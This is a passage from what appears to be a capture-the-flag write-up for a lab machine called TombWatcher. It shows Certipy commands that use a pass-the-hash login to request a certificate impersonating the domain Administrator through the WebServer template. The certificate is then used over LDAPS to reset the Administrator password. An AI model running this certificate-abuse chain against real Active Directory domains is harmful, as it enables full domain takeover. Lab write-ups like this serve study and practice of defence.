└─$ certipy req -u 'cert_admin@tombwatcher.htb' -hashes :f87ebf0febd9c4095c68a88928755773 -dc-ip 10.129.13.255 -target 'tombwatcher.htb' -ca 'tombwatcher-CA-1' -template 'WebServer' -upn 'administrator@tombwatcher.htb' -sid 'S-1-5-21-1392491010-1358638721-2126982587-500' -application-policies 'Client Authentication'
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 3
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@tombwatcher.htb'
[*] Certificate object SID is 'S-1-5-21-1392491010-1358638721-2126982587-500'
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

Step 2: Authenticate via Schannel (LDAPS) using the obtained certificate.

└─$ certipy auth -pfx 'administrator.pfx' -dc-ip '10.129.13.255' -ldap-shell
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator@tombwatcher.htb'
[*]     SAN URL SID: 'S-1-5-21-1392491010-1358638721-2126982587-500'
[*]     Security Extension SID: 'S-1-5-21-1392491010-1358638721-2126982587-500'
[*] Connecting to 'ldaps://10.129.13.255:636'
[*] Authenticated to '10.129.13.255' as: 'u:TOMBWATCHER\\\\Administrator'
Type help for list of commands

# 

Let’s change the password

# change_password Administrator P@ssw0rd@123
Got User DN: CN=Administrator,CN=Users,DC=tombwatcher,DC=htb
Attempting to set new password of: P@ssw0rd@123
Password changed successfully!

# 

and we are in as administrator and got root.txt